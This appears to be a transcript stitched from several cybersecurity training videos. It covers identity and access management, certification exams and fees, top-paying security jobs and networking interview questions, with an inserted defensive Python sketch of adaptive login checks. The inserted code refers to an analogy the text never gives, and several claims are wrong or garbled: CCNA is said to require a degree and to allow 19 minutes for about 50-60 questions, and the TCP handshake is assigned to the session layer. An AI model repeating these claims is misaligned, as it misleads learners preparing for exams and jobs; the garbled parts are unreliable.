SSO is an IAM tool that enables a user to log into one of an organization's properties and automatically be logged into a designated set of other properties. For example, when you log into Google, you are automatically logged into your Gmail and your YouTube accounts. For users, single sign-on reduces friction, since they don't have to keep track of different credentials for every application. For organizations, SSO helps in collecting valuable insights about user behavior and preferences, since it tracks them as they move from one application to another, connected by one single login.

Next is multi-factor authentication, or MFA. Implementing multi-factor authentication is crucial to protect your organization's data from malicious intrusions, and virtually every IAM platform offers some form of MFA. However, it's equally crucial to customize MFA with the appropriate level of security. For example, in business-to-consumer scenarios you need to consider UX and try not to create unnecessary friction for users who don't want to be subjected to heightened scrutiny every time they log in. For workforce IAM you may want a more stringent MFA, since the consequences of an unauthorized party gaining access to your private network can be so devastating. A modern IAM solution will allow you to implement MFA only when it's needed. This can be accomplished with step-up authentication or adaptive authentication, in which users only trigger MFA if they are trying to access sensitive data or their behavior is flagged as risky.

In the past few years, identity has become the preferred gateway for hackers to break into systems. Brute-force attacks, credential stuffing attacks and even highly targeted phishing campaigns are all advanced by hackers to break in through a company's front door, which is the login box. There are multiple ways IAM systems can help detect and mitigate these malicious attacks. IAM solutions detect attacks by monitoring signals such as the velocity of traffic, detection of login patterns that deviate from a user's routine, use of a breached password, and use of devices and IP addresses with a poor reputation, among other things.

These are some of the most widely used tools when it comes to IAM frameworks. But why do we go through setting up so many tools and firewalls? Let's go through some of the advantages of using IAM systems in both corporate and consumer environments.

An IAM solution helps identify and mitigate security risks. You can use IAM to identify policy violations or remove inappropriate access privileges without having to search through multiple distributed systems. We can also leverage IAM to ensure that security measures are in place to meet regulatory and auditing requirements. IAM provides a common platform for access and identity management information: you can apply the same security policies across all the operating systems and devices used by the organization. The IAM framework can help you enforce policies related to user authentication, privileges and validation, and attend to the privilege creep problem. IAM simplifies sign-up and user management processes for application owners, end users and system administrators; it makes it simple to provide and manage access, and it promotes user satisfaction. IAM services can also lower operating costs: using federated identity services means you no longer need local identities for external users, which makes application administration easier. Cloud-based IAM services can reduce the need to buy and maintain on-premise infrastructure.
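The workflow just described, as a runnable illustration (an added example written for this page, not code from the video or from any IAM product): a principal presents a password, risk signals decide whether to step up to MFA, and an RBAC table decides what the role may do with each resource. The permission table, breached-password list, IP-reputation list, sample users and the HMAC-based second factor are all constructed for the example, and the `handle_request` and `risk_signals` names are this example's own.

```python
"""Toy IAM workflow: principal -> authentication (adaptive MFA) -> request -> RBAC authorization.
Added example; all data below is constructed, not taken from any real deployment."""
import hashlib
import hmac
from dataclasses import dataclass, field
from datetime import datetime, timedelta

# Role-based access control table: role -> resource -> allowed actions (constructed).
ROLE_PERMISSIONS = {
    "accountant": {"payroll": {"read", "modify"}, "file_share": {"read"}},
    "network_admin": {"printer": {"read", "modify", "delete"}, "file_share": {"read", "modify"}},
}
# Constructed threat-intel inputs: SHA-256 of passwords seen in breaches, and addresses with a
# poor reputation (203.0.113.0/24 is the TEST-NET-3 documentation range).
BREACHED_PASSWORD_HASHES = {hashlib.sha256(b"Password123").hexdigest()}
BAD_REPUTATION_IPS = {"203.0.113.7"}
VELOCITY_LIMIT = 3                      # successful logins allowed per VELOCITY_WINDOW
VELOCITY_WINDOW = timedelta(seconds=60)


@dataclass
class Principal:
    """A user, role or application that raises requests against resources."""
    name: str
    role: str
    salt: bytes
    pw_hash: bytes
    mfa_secret: bytes
    known_ips: set
    recent_logins: list = field(default_factory=list)


def hash_password(salt: bytes, password: str) -> bytes:
    # PBKDF2 stands in for a proper password KDF (argon2/bcrypt in production).
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 50_000)


def make_principal(name, role, password, mfa_secret, known_ips):
    salt = hashlib.sha256(name.encode()).digest()   # deterministic salt keeps the example reproducible
    return Principal(name, role, salt, hash_password(salt, password), mfa_secret, set(known_ips))


def mfa_code(secret: bytes, now: datetime) -> str:
    # Simulated second factor: HMAC over a 30-second window (TOTP-like, not an RFC 6238 implementation).
    window = int(now.timestamp()) // 30
    return hmac.new(secret, str(window).encode(), "sha256").hexdigest()[:6]


def risk_signals(user: Principal, password: str, ip: str, now: datetime) -> list:
    """The signals the passage lists: breached password, device/IP reputation, unusual pattern, velocity."""
    signals = []
    if hashlib.sha256(password.encode()).hexdigest() in BREACHED_PASSWORD_HASHES:
        signals.append("breached_password")
    if ip in BAD_REPUTATION_IPS:
        signals.append("bad_ip_reputation")
    elif ip not in user.known_ips:
        signals.append("unfamiliar_ip")
    recent = [t for t in user.recent_logins if now - t <= VELOCITY_WINDOW]
    if len(recent) >= VELOCITY_LIMIT:
        signals.append("login_velocity")
    return signals


def authenticate(user: Principal, password: str, ip: str, now: datetime, code=None) -> dict:
    """Step 1: confirm identity; step up to MFA only when the login looks risky (adaptive MFA)."""
    if not hmac.compare_digest(hash_password(user.salt, password), user.pw_hash):
        return {"ok": False, "reason": "bad_password"}
    signals = risk_signals(user, password, ip, now)
    if signals:
        if code is None:
            return {"ok": False, "reason": "mfa_required", "signals": signals}
        if not hmac.compare_digest(code, mfa_code(user.mfa_secret, now)):
            return {"ok": False, "reason": "bad_mfa", "signals": signals}
    user.recent_logins.append(now)
    return {"ok": True, "signals": signals}


def authorize(user: Principal, action: str, resource: str) -> bool:
    """Step 3: RBAC lookup. The role's table decides, not anything the request claims about itself."""
    return action in ROLE_PERMISSIONS.get(user.role, {}).get(resource, set())


def handle_request(user, password, ip, action, resource, now, code=None) -> dict:
    """Full flow: authenticate the principal, then evaluate the request against its role."""
    auth = authenticate(user, password, ip, now, code)
    if not auth["ok"]:
        return {"status": "denied", "stage": "authentication", **auth}
    if not authorize(user, action, resource):
        return {"status": "denied", "stage": "authorization", "reason": "rbac"}
    return {"status": "allowed", "signals": auth["signals"]}


if __name__ == "__main__":
    now = datetime(2023, 1, 1, 9, 0, 0)
    acct = make_principal("anne", "accountant", "correct horse battery", b"k1", ["198.51.100.10"])
    print(handle_request(acct, "correct horse battery", "198.51.100.10", "modify", "payroll", now))
    print(handle_request(acct, "correct horse battery", "203.0.113.7", "read", "payroll", now))
```

Run as a script, the block prints two decisions for the constructed accountant: an ordinary login from a known address that is allowed to modify payroll, and a login from a poor-reputation address that is held at the authentication stage until a second factor is supplied. The design point is that authorization only ever consults the role's entry in ROLE_PERMISSIONS, which is what the passport analogy above means; the request names the action and resource but never grants itself anything.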
So, the importance of a cyber security certification. First and foremost, when I see a certification I look at it from three different aspects. The first is the training itself, which allows me to gain the knowledge, which allows me to understand the aspects of security or whatever the certification is there for. The second aspect is the exam itself: how do I need to prepare myself for the exam, how do I need to approach the exam, how do I need to ensure that I pass in my first attempt. And the third aspect is the certification itself, which allows me to be eligible to apply for a particular job role.

So obtaining a cyber security certification ensures, or shows to the organization that you're applying to, that you do have the prerequisite knowledge and you should be shortlisted for an interview. The knowledge that you have gained during the training will help you when you attend that interview and when you attempt to answer the questions asked of you. These certifications are designed for a specific role. For example, a forensic investigation certificate will teach you how to investigate a crime scene forensically, a digital crime scene for that matter; a certified ethical hacking course will teach you about penetration testing. So it is you who's going to decide which certification you require, and then attempt to get certified on it. Of course, a fresher with a cyber security certification will have better employment opportunities, because they can showcase their knowledge with the certification that they already have. Even professionals who want to enhance their careers can get into managerial or advanced certifications to improve on their knowledge and get promoted in their job profiles.

Cyber security certifications can be classified into three different levels: the first one being the foundational level, then the managerial level and the advanced level. In the previous video we just had a small overview; here we are going to discuss what the certification covers, how the exams are conducted and the price points for each and every exam. So let's start with the foundational certifications.

We start off with CCNA, which is the basic certification for networking. The CCNA Routing and Switching certification basically helps you build your networking career. You will join an organization as a networking engineer, where you can help the organization establish the routing, the pathing of how data packets will travel across the network. This certification covers all the basic concepts that you would require to understand networking. The basic requirement for this certification is that the candidate must have a bachelor's degree; apart from that there are no other prerequisites. So you just need a bachelor's degree and then you can apply: you can study for this, you can undergo a training, and then you can attempt the exam. The certification provider obviously is Cisco, so the knowledge covered in this training and certification is for Cisco devices only. The exam fee for this certification is approximately 325 dollars. The exam has around 50 to 60 odd questions which need to be answered in 19 minutes. The types of questions that you are going to get are multiple choice questions, where you have a question and four answers and you have to choose the correct answer among those; drag and drop, where you have to click on an object and drag it to its appropriate place, probably an architectural diagram where you have to, let's say, pick a router and place it into a particular position (if you place it correctly you answer the question correctly, otherwise it's wrong); and a simulator, where there could be a configuration you need to configure in a particular manner and then check whether the configuration is correct or not. The pass mark is around 800 to 850 out of a possible thousand marks. Each question will have a different weightage depending on the depth of the question or the difficulty level of the question, which would then count towards your marks, and if you score 800 to 850 that's when you clear the exam. The job roles, as we have discussed over here, would be more on the network administrator side or the network engineer side, depending on the level of experience that you have. The salaries that are expected from these job roles in the U.S. are around fifty five thousand dollars to ninety thousand dollars annually.

The next one is the CompTIA certification called Security+. CompTIA is also a global certification authority for infosec courses. This certification teaches candidates how to secure applications, networks and devices; it focuses on hands-on practical skills in the field of network security. I have trained people on this certification myself, so I know this certification is quite hands-on: it deals with the concepts to the core, it helps you understand the concepts, and then in the practical hands-on demo you need to execute the practical yourself so that you can gain that knowledge. The recommended level for a candidate to attempt this training would be at least around two years of experience in the IT sector. In addition, if you have already been certified for the Network+ certification from CompTIA, which is the baseline networking certification, this is also a preferred way to go for this certification. As said, CompTIA is the certificate provider, and the exam fee for this certification is 339 dollars. The exam is quite simple: 90 questions in 90 minutes, that's one minute per question. It sounds like a lot of time, but believe me, the questions can be a little bit confusing, can be a little bit lengthy, so you will require all those 90 minutes to answer those questions, especially when they're tricky and they're technical in nature. The questions would be multiple choice and performance based. The pass mark for this exam is around 750 points out of a possible 900. The job profiles for this kind of certification are when you want to apply for a security analyst position or a security engineer's position, where you're going to analyze some data to understand and figure out what problems are ongoing in the organization. The average annual salary of this person would be around 72,000.

Then comes the CEH, or the Certified Ethical Hacker training from EC-Council. Now this is a very well known course, and EC-Council is a global certifying authority, very well accepted across a lot of countries. This is an offensive certification, so here you're basically trying to become a penetration tester: you're taught how to hack, you're taught how to attack a particular organization from an ethical hacker's perspective. So the job profiles that you'll be looking at here are of a pen tester, where you go into an organization, you test their security controls or you test their devices, find out flaws within them, and then provide recommendations of how to plug those flaws or mitigate those flaws and improve the security of that organization. It is recommended that you have at least two years of experience in networking or security to attempt this kind of training and certification. Again, a basic understanding of networking, or maybe a little bit of applications and operating systems, would be necessary before attempting this certification. The certification provider is EC-Council and the exam fee for this certification is 500. The exam here would be 125 questions which need to be attempted in four hours, and you will only get multiple choice questions in here. Now for CEH there are two exams: one is the multiple choice questions, and the second is a practical exam where you need to solve some problems given to you in an iLabs scenario, and if you are able to solve them properly you then get certified for CEH Practical. The cutoff varies from 65 to 85 percent depending on the questions that you have answered and the weightage associated with each and every question. As said, the job roles would be as a penetration tester or a security engineer, and your salaries would start from around 90,000 annually.

Then comes the CND, or the Certified Network Defender, also from EC-Council. Now this is more on the network defense side, so here the job roles would be where there's a network that you have and you're going to try to secure the network and the communications that are going to travel over the network. So you need to be a network administrator, a network security engineer or in a similar profile to understand how networks work, and then you're going to attempt to secure those networks. The certificate provider again is EC-Council, and this certification is placed a little bit below CEH: so it becomes network defense first, then CEH, where you're going to become a penetration tester. The exam fee for this certification is 350 US dollars per exam. The exam is of 100 questions to be answered in four hours; again it's just multiple choice questions, so you get a question with four options, you answer the correct one and you move on to the next question. The pass percentage again varies from 60 to 85 percent depending on the questions answered and the weightage of that question. Job roles to be applied for: network defense technician, CND analyst or a security analyst from a network perspective. Salaries would range from 65,000 to 75,000 per annum.

Then comes the forensic investigator course, which is exactly what it is: digital forensic investigator. This will help you understand how computers work, where data is stored and how you can retrieve that data to investigate a crime that has taken place. So the candidate must have at least two years of experience in the information security sector; they need a good understanding of how networks work, how computers work, how operating systems work, how they store data, the location where that data is stored, how databases work, how those databases store that data, and so on and so forth. This certification is sought after mainly in the law enforcement areas, but there are a few corporates that offer forensic investigation as a service, especially when a corporate gets compromised and they want to conduct their own investigations. The certification provider for this is also EC-Council, and the exam fee is 500. This is an advanced level certification, so an understanding of applications, networks and operating systems is a must before you attempt this. The exam is quite similar: 150 questions in four hours, and again it's just a multiple choice question exam. The cutoff again is from 60 to 85 percent depending on the questions and the weightage of each and every question. Job roles: IT security specialists, network security professionals, forensic investigators, law enforcement agencies, security specialists, homeland security jobs. Annual salaries would be around 88,000 and above.

All right, now let's talk about the managerial level certifications. COBIT stands for Control Objectives for Information and Related Technologies. It's a certification that will give a candidate an in-depth knowledge of the framework, which COBIT is all about, and the framework helps you manage and govern enterprise IT environments. Now this is an advanced certification, so around eight years of managerial experience is suggested before you attempt the COBIT 5 certification, to understand all the aspects and to help you implement the framework properly. The certificate provider is ISACA. The exam fee is around 175 dollars. Now this is a small exam, 50 questions but in 40 minutes, so you really have to be on your toes; you have to know the knowledge, there is very limited time to think, and you have to be fast in your answers. The pass percentage is 50. The job roles associated with this certification would be when you apply for information security manager, or as a security consultant or a cyber security manager, and your roles and responsibilities would be to govern the IT space that the organization owns: so all the servers, desktops, the network, the data flows, the databases, everything, and how it needs to be managed and how it needs to be governed in a secure manner. Annual salaries would be around a hundred thousand dollars plus.

Then the CISM. It stands for Certified Information Security Manager and, as the name suggests, it's a security manager certification. It helps the candidate in understanding the relationship between business goals and information security. So now you're going into the space where you're not only technical in nature, but you also have to understand the business needs, the goals of the business, and you have to align the information security of your infrastructure with the business needs and the business goals. So it is your inputs that are going to go to the management to see if the infrastructure is aligned to the business goals, or if the infrastructure or the business goals need any fine tuning. Around five years of work experience is recommended in the information security field for attempting the CISM; out of the five years, the candidate must have a background as an information security manager for three years, so you have some experience as a manager, you have implemented those things yourself, which will give you a better understanding, and then you attempt the certification. Again provided by ISACA, and the exam fee for ISACA members is 575 dollars; for non-members it is 760 dollars. The exam is where you have to answer 150 questions in four hours, quite a bit of time, but the questions are going to be scenario-based questions where they're going to give you a lot of scenarios, you have to think about it, and you have to give the most probable and the correct answer for that particular scenario. The pass mark is 450 out of 800. Your job profiles would be either a risk manager or a risk consultant, analyzing the business requirements against the infrastructure security that you have, identifying if there are any risks associated with the infrastructure, highlighting those risks, and then putting in security controls and managing those controls in a way where the risk is mitigated. Your average salaries would be around 88,000 and above.

Then the CISA, the Certified Information Systems Auditor certification. It not only looks into security but it also looks into auditing and controls in information systems. This is a highly reputed certificate, and you gain a better understanding of governance, regulations and auditing your information landscape. Again, a minimum of five years of work experience in the field of information systems auditing, control or security is necessary. Now here the question would be, what's the difference? Security is where you're technical in nature: you have done, let's say, a vulnerability assessment or a penetration test, you have implemented firewalls, you have architected security. Controls are all about the security controls that you're going to implement, like firewalls, IDSs, IPSs, data loss prevention systems, maybe even UTMs and whatnot; so, experience in architecting or implementing those controls in an effective manner, mitigating the security issues or the vulnerabilities that you have identified in the organization. And auditing would basically mean looking at compliance to ensure that everything is in place: you're compliant with, let's say, ISO 27001 guidelines or the policies that you have created yourself, and everything is working in order. So it's more of a checklist where you're going to just check that everything is in place and you're conforming to standards. This certification is also provided by ISACA, and the exam fee for ISACA members is 575 dollars, whereas non-ISACA members will have to pay 760 dollars for the certification. 150 questions again in four hours, multiple choice questions, scenario based, so you have to really understand the real-world scenarios of what controls and what audit mechanisms should be in place. The pass mark is 450 out of 800. Your job roles would be mainly becoming an auditor or a senior auditor or director for information security, information audit manager or information technology consultant, where you provide intelligence on how the company should implement their infrastructure. Average salaries would be one hundred and three thousand and above.

Then comes the CRISC, Certified in Risk and Information Systems Control. This certification helps the candidate design and maintain information systems controls for an organization. This is one of the most sought after certifications as far as risk management is concerned, in Europe and in the U.S. If you have this kind of certification you automatically qualify for a risk manager or a security risk manager or an information security consultant kind of a role. You should have a minimum of three years of experience in the field of IS controls, that means information security controls: you should have knowledge about firewalls, you should know how to mitigate risks, how to identify risks in the first place, risk analysis, risk management, after which you're going to implement security controls to mitigate that risk or bring it to acceptable levels. At this point in time you will also be responsible to create policies revolving around those risks, and how you want to calculate those risks and treat those risks in their lifetime. Certificate provider again is ISACA: 575 dollars for ISACA members, 760 dollars for non-ISACA members for the exam fees. A similar exam, 150 questions to be answered in four hours, multiple choice and performance based, so they may give you a scenario where you have to perform a risk analysis and provide a report and a solution based on your findings. Again the pass mark is 450 out of 800. The job profiles associated, as discussed earlier, are IT risk management professionals, where they're going to identify risks, treat those risks, calculate, analyze, maybe do a business impact analysis to ascertain how the organization is going to be affected, and then you will also be looking at compliance as far as these job roles are concerned. Average annual salary would be 119,000 and above.

Moving on to the advanced level certification. Now this is where we come across the CISSP certification, Certified Information Systems Security Professional. This is the gold standard of all certifications; if you have this certificate you can basically be assured of a job in the IT world. Now just to qualify you'll have to have five years of experience in the information security field. There are eight domains that are specified by CISSP, and you have to prove that you have knowledge and work experience of around five years in at least two of those domains. If you do not have that kind of experience you can still attempt the exam, but you become an Associate of (ISC)², which means that you get six years to accomplish the five years of experience requirement for this certification. Before taking up the certification we suggest that the candidate clears all the intermediate level certifications, not all but some of them. In fact I have seen people do the other way around: they qualify for CISSP, they give the exam, and once you're CISSP the CISA or CISM exams are way easier to crack, but you need to have that kind of experience. I have seen people with 15 years of experience and more fail at this certification in the first attempt. The certificate provider is (ISC)², and the exam fee is 699. Like I said, this certification is the most sought after, the gold standard; in fact there's hardly any other certification after this that you might want to do. Now the exam has changed: if it is the English version that you're giving, it's 150 questions to be answered in three hours; if it is a non-English exam that you're attempting, then it is 250 questions in six hours. It's a marathon, and if you're opting for the six hour exam you need to plan it really well. It sounds really easy, but the questions are quite tough, they're scenario based, and the answers are quite confusing as well. You would get multiple choice questions, you would get drag and drop, and you might get simulators as well. The pass mark is 700 out of 1000, but each question has a different weightage, so it depends on which questions are asked of you and which questions you've answered correctly. The job roles associated with this certification would be anything and everything in information security at the managerial level and above: so information security manager, risk manager, information system security officer, the CSO role, the CISO (Chief Information Security Officer), any role that you might think of from a risk, compliance or strategy perspective could be achievable after this kind of certification. The average annual salary is 108,000 for this certification.

Technology has become more intertwined with our daily lives, hence it is no surprise that the need for skilled cyber security professionals is on the rise. Cyber security is a lucrative field and there is a dearth of skilled cyber security experts; therefore, currently a career in cyber security is something you should consider if you're looking for an interesting job role. On that note, hey everyone, welcome to yet another exciting video by Simplilearn, which will take you through the top 10 highest paying cyber security jobs for 2022. But before we begin, if you are new here and haven't subscribed already, make sure to hit the subscribe button and the bell icon for interesting tech videos every day. So let's get started.

At number 10 we have the job role of a cyber security analyst. Cyber security analysts are professionals who keep a constant check on any threat and monitor the company's network for potential vulnerabilities.
They react swiftly to restore protection if compromised. They identify and correct flaws uncovered in the company's applications, programs, security systems, computer networks and more. Cyber security analysts even recommend ways to improve the business's overall security and communicate the specific measures to be taken. They compile ongoing safety reports and document security issues and the measures taken to resolve them. Now let's have a look at the salary of a cyber security analyst: according to Glassdoor, a cyber security analyst in the United States earns about 80,000 US dollars per annum, and in India you can earn nearly 6 lakh rupees annually.

Next on our list we have the job role of a network engineer. A network engineer is a person who understands the structure and network essentials of the entire organization at a macro level. They design and maintain any network that supports the company's life cycle and growth opportunities. Network engineers take charge of the configuration and installation of network devices and services. They also collaborate with the security team and ensure network security through the implementation of tools and procedures in line with them. They monitor network performance and ensure reliability and availability. According to Glassdoor, a network engineer in the U.S. earns over 85,000 US dollars per annum, and in India the average salary is 4 lakhs annually.

Moving on, the next job role on our list is that of an ethical hacker. Ethical hackers are network security consultants who identify and exploit system vulnerabilities just like a hacker would. They are also known as white hat hackers. They scan the network and systems for vulnerabilities before a black hat hacker would. Ethical hackers probe and test the network using various penetration tools and software; additionally, they also design new penetration tools and document the test results. According to PayScale, in the US a certified ethical hacker earns around 96,000 on an annual average basis, and in India they make around 5 lakh rupees per annum.

Moving to our next job role, we have malware analyst. A malware analyst analyzes malicious software, which includes bots, worms and Trojans, to understand the nature of the threat. A malware analyst has a dual mentality, being both forward-thinking and reverse-thinking. Moving on to the responsibilities of a malware analyst: firstly, they use tools and expert-level knowledge to help decide what kind of malware they are disassembling and whether they have encountered this particular kind of malware before; they will use dynamic malware analysis tools to achieve insight into software attacks. Secondly, they also uncover hidden indicators of compromise that should be blocked, and keep an organization's software updated to protect against the latest malware threats. According to Glassdoor, in the U.S. a malware analyst can earn about 97,000, and the average salary for a malware analyst is around 5 lakh rupees in India.

Up next we have another very interesting job role, that is information security analyst. An information security analyst is an expert who plans, implements, upgrades and scrutinizes security protocols to safeguard an organization's computer networks and information. These professionals play a vital role in the public, private and non-profit business sectors because they shield a company's sensitive and fundamental information. They use data encryption, firewalls and other relevant security tools and applications to cover and protect transfers of secret digital information. Security analysts perform risk assessments, audits and tests to ensure the proper functioning of data processing activities and security measures. As per Glassdoor, the national average salary of an information security analyst is around 99,000 per annum in the States, and as per indeed.com, in India you can earn nearly 7 lakh rupees per annum.

Let's have a look at the next highest paying cyber security job, that is cyber security engineer. A cyber security engineer helps to design and implement methodologies to secure the organization's cyberspace. They also help in testing and monitoring systems frequently to make sure that all of the systems are up to date and work perfectly to defend the information. They troubleshoot security and network problems and ensure that the organization's data and infrastructure are protected by enabling the appropriate security controls. Cyber security engineers also conduct tests and scans to identify any vulnerabilities in the network and system. Talking about the salary, in the United States a cyber security engineer earns over 101 thousand dollars per annum; as per PayScale, the average salary for a cyber security engineer in India is nearly 7 lakh rupees.

Moving on to the next job role, we have senior security consultant. A senior security consultant protects their clients' network through regular situational assessments. Senior security consultants are required to carry out an assessment of security networks to spot a system's vulnerabilities, strengths and weaknesses, following which they guide different IT teams in strengthening their security by helping them pick the right solutions, like new techniques or tools. They also create preventive measures against future cyber attacks. According to Indeed, the average annual salary of a senior security consultant in the States is around 104,000, and in India it is nearly 12 lakh rupees.

Next we have the role of an application security engineer. Application security engineers work with product managers and developers to plan and implement security releases. In order to understand any vulnerabilities within products, they carry out threat modeling tests, dynamic tests and security reviews; following this, they optimize a given product's efficacy. They ensure that every step of the software development lifecycle follows best security practices. They also help in testing the application against security risks before release. According to Glassdoor, in the US an application security engineer earns around a hundred and ten thousand dollars on an annual average basis, and in India they make around 9 lakh rupees per annum.

Moving on to our next job role, we have security architect. A security architect researches and plans the security elements for their firm. They formulate company procedures and user guides, and design robust security structures that are capable of preventing malware attacks. Additionally, they also approve the installation of VPN routers and firewalls. According to Glassdoor, a security architect in the US makes a handsome sum of 150,000 a year on average, and in India they make around 20 lakh rupees per annum.

And finally, at number one on our list we have the role of a chief information security officer, CISO. A CISO is a senior level officer in an organization; their duty is to ensure the safety of the information. They develop, implement and maintain information security and risk management programs. Additionally, they also interact with stakeholders and regularly brief them on information security concerns. According to Glassdoor, the average annual salary of a chief information security officer in the States is a whopping 195,000, and in India it is 19 lakh rupees per annum. So those were the top 10 highest paying cyber security jobs for 2022.
Now let's have a look at the companies hiring cyber security professionals. Here we have Deloitte, NetApp, KPMG, Bosch, HP, Samsung, CGI and GE, to name a few. In this series we are going to discuss the interview questions that will be asked to candidates in the cyber security field. We are going to look at multiple options over here, and we're going to discuss various fields in which these questions will be asked. In this video we are going to look at 10 different questions on networking, then we'll have 10 more questions on software and programming, another 20 questions on operating systems and applications, 10 questions on cyber attacks, and then finally 10 questions on cryptography. So we're going to discuss 50-odd questions across these different fields, which will help you crack your interviews as far as cyber security is concerned. Let's start off with networking questions. Question one: what is the OSI model? Explain the different layers of the OSI model. OSI largely is a theoretical model utilized to understand networking, how data packets are created and how they are being processed by a computer. This is normally used by TCP/IP, the Transmission Control Protocol over Internet Protocol software suite. So OSI is known as the Open Systems Interconnection model. It is a reference model that describes how applications are going to interact via the computer network. There are seven different layers that we need to understand, and they are as follows. In this diagram there are these seven different layers; we start off from the bottom: first is the physical layer, then the data link layer, network layer, transport layer, session layer, presentation layer and application layer. When such a question is asked in an interview, it is not only that we identify these seven layers: we explain what the OSI model is in the first place, then we identify these seven layers and give a brief description about each and every layer. If there are any additional questions, they will
come after this basic question. So let's start off with the physical layer. This is the lowest layer of the OSI model; this is where any and every physical part of your computer comes into the picture. It could be a network interface card, it could be an RJ45 or a CAT5 cable, anything that allows data to be transmitted physically from your machine to another machine. Next comes the data link layer. On the data link layer, as far as networking is concerned, we just need to understand that the data packet is encoded and decoded into bits at this layer. This is also the layer that deals with MAC addressing, so the physical address of every network interface card, which is the MAC address that is utilized to route data packets over the network: this is where the MAC address resides, on the data link layer. The next layer is the network layer. Here datagrams are transferred from one node to another; the functions of this layer are routing and logical addressing. The moment we talk about routing and logical addressing, IP addresses come into the picture: IP version 4 and IP version 6.
So the network layer will deal with IP addressing and the routing of those packets. Then comes the transport layer. This is the layer responsible for end-to-end connections, which automatically signifies that this is where TCP and UDP will be working. TCP stands for Transmission Control Protocol, UDP for User Datagram Protocol. TCP is a connection-oriented protocol, whereas UDP is a connectionless protocol. These two protocols are utilized to establish connectivity between two machines. TCP is a more reliable method of connectivity because there are a lot of packets that are sent across to verify that the data has been sent, data has been received and so on and so forth, whereas UDP is a connectionless protocol where data is just dumped without verifying whether the receiver actually receives that data or not. So in a nutshell, on the transport layer TCP and UDP make their appearance, and this is where that functionality lies. Then comes the session layer. This controls signals between the computers; it establishes, maintains and terminates connections between processes. So in the transport layer we talked about TCP and UDP, UDP being a connectionless protocol where data is just transmitted without verifying whether the receiver received that data or not, whereas TCP, we studied, is more of a reliable protocol; thus there are different packets and signals that will be sent across to verify that data has been transmitted, that it has been received properly, and then the next segment of that data is sent. Those control signals are established using the session layer. So the three-way handshake of TCP, the acknowledgment packets and those kinds of packets will be taken care of on the session layer of the OSI model. Then comes the presentation layer. The presentation layer is responsible for translating data into the application layer format, so the formatting, the MIME or encoding that is being utilized, the UTF-8 character set that we utilize for presentation, encryption mechanisms: all of these work on the
presentation layer. And finally comes the application layer, where the application itself uses a particular protocol so that the other machine on the receiving end, the application on that machine, would be able to understand what the communication was about. So in a nutshell, if I start from up top: the application layer will deal with any of the data that the application is generating, so maybe a user input, you're logging in, you're typing a username and password; all that data will be constructed, let's say, into an HTTP or HTTPS format, and that's where your application layer comes into the picture. Then the formatting of that into UTF-8 and the encryption of it would be done at the presentation layer. Then the transport layer and the session layer would kick in to establish a TCP session, do the three-way handshake and establish that connectivity. IP addressing would be done on the network layer, MAC addressing would be done on the data link layer, and when everything is ready, on the physical layer the packet will be sent out. At the receiving end the packet will be received on the physical layer and then all these layers will be reversed, and finally at the application layer the data would be presented to the application, which would then execute it and showcase it on the screen of the recipient. So this is the way you want to explain this question: you want to be very concise and precise about what you're explaining, you don't want to go into too many hypothetical scenarios, you don't want to go too deep into each of the layers, you just want to give the basic functionality. You want to demonstrate that you understand what the OSI model is and how the computer functions, and you want to move on from there. If the interviewer has any further follow-up questions, they will ask those specific questions. So that's question one. Moving on to question two. Question two is: define unicasting, multicasting and broadcasting. Now this is a question which can be very lengthy, but again most of your interview questions are
designed that way; it's basically to understand how much you are conceptually aware of these technologies, so you have to be very concise. Don't go rattling on about the technology too much, but in a concise manner just try to explain what these things are. So when data is being transmitted over a network, it can be transmitted in one of these particular manners: it can either be a unicast, a multicast or a broadcast. So what is unicast? Unicast is when a message is sent from a single user to a single receiver, so one to one, right: one machine talking to another machine and nobody else, also known as point-to-point communication. If you have to send information to multiple receivers, then you will have to send it using multicast; this is where your multicast networking comes into the picture. So in our case, let's assume it's a network where there's a Class C network, approximately 255-odd machines, and within these there are two machines that want to talk to each other. If they want to talk between each other, it would be a point-to-point communication where they will utilize unicast, where only these two machines will have visibility of that conversation and the other machines will not even realize that this conversation is taking place. If one machine wants to talk to multiple machines, then multicast comes into the picture. As the name suggests, in this mode of communication data is sent from one or more sources to multiple destinations. Multicast uses the Internet Group Management Protocol, also known as the IGMP protocol, to identify groups. So under this IGMP protocol various groups are created where machines are subscribed to those particular groups, and whenever a message needs to be sent to those groups it will be identified by the IGMP protocol, and then that particular message will be sent to those multiple machines that are members of those particular groups. And then comes the broadcast. The third method is known as the
broadcast; as it says, it is going to broadcast to all. So this is one to all, that is communication from a single user which is going to be sent to all the machines in that particular network. So the three ways: unicast is one to one, multicast is one to many and broadcast is one to all. Then question number three: what is DNS? DNS stands for Domain Name System. It is like the internet's phone book that is responsible for mapping a domain name to its corresponding IP address. Let me give you an example over here: whenever we go and open up, let's say, a browser, a Google Chrome browser, we type in www.google.com and then we press enter, and magically Google, the website rather, comes in front of us. Now how does the computer know who Google is? Because as far as we are concerned, humans understand Google and words like that; computers don't. Computers deal with binary, zeros and ones, right, and as far as the internet is concerned they will only deal with IP addresses and MAC addresses. So how does a computer know how to find google.com and where it is located? The moment we type google.com in the address bar of the browser window and press enter, a DNS query is generated automatically by the browser, where a packet is sent to our DNS servers asking what the IP address is. So in short, DNS resolves domain names to their corresponding IP addresses. There is a DNS server which will have this index, a database of all the domains associated with their IP addresses; if one particular DNS server does not have the information that you're looking for, it may query another DNS server which may have that particular response. So the first thing is, when you type in a domain name it gets resolved with the DNS: it identifies the IP address corresponding to that particular domain name and thus allows the computer to route that packet to the particular server where that domain name resides. So in this scenario, if you look at the screen, on the local PC you have typed in cybersecurity.com and there's a
DNS resolution, a query that goes to the DNS server: what is the IP of cybersecurity.com? The DNS server looks it up in its particular database, and if it has the corresponding IP address it will then respond back that the IP address is 172.17.252.1, after which the packet is sent off to cybersecurity.com. Moving on to question number four: what is a firewall? Now this is a very good question, and normally a very basic answer that I've heard is that a firewall is a hardware and a software firewall. But that's not the functionality of a firewall, that is how you can install a firewall; there are different types of firewalls and there is a specific functionality that the firewall is created for. So a firewall is either hardware or software, but its responsibility is blocking either incoming or outgoing traffic from the internet to your computer; they secure a network. So essentially the firewall will allow a connection to happen or disallow a connection from happening; it won't go beyond that. That's the basic functionality of a firewall. Based on the configurations that you have done, based on the rules that you have created on the firewall, it will then, based on those rules, identify whether some traffic is allowed in that network or some traffic is to be blocked from entering that network. So as the screen shows, the firewall rules will analyze whether the traffic is good: if yes, it will allow it; if the traffic is bad, it will block the traffic and not allow that connection from happening in the first place. Now there are a few common types of firewalls that also need to be included in the answer to this question. The first one is a packet filtering firewall. These are the most common types that you 